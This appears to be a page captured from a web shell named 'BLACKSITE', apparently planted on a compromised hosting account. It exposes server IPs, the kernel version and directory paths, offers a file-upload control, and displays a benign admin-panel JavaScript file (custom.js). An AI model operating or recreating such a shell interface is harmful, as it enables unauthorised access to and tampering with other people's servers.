BLACKSITE
:
216.73.217.173
:
119.18.54.19 / www.yugtechnologies.com
:
Linux sh200.bigrock.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
:
/
home1
/
yugte9pz
/
www
/
back_js
/
Upload File:
files >> /home1/yugte9pz/www/back_js/custom.js
function ucfirst(str) { strVal = ''; str = str.split(' '); for (var chr = 0; chr < str.length; chr++) { strVal += str[chr].substring(0, 1).toUpperCase() + str[chr].substring(1, str[chr].length) + ' ' } return strVal } $.fn.once = function(a, b) { return this.each(function() { $(this).off(a).on(a,b); }); }; $(function(){ $("html").niceScroll({ styler:"fb", cursorcolor:"#65cea7", cursorwidth:'6', cursorborderradius:'0px', background:'#424f63', spacebarenabled:false, cursorborder:'0', zindex:'1000' }); $('#select-all,.select-all').click(function(event){ var this_check = this.checked; // Iterate each checkbox $('.dataTables_wrapper tbody :checkbox').each(function(){ this.checked = this_check; }); }); $(".panel .fa-chevron-down").once('click',function(){ $(this).closest('.panel').find('.panel-body').toggle('fast'); }); $(".panel .fa-times").once('click',function(){ $(this).closest('.panel').remove(); }); });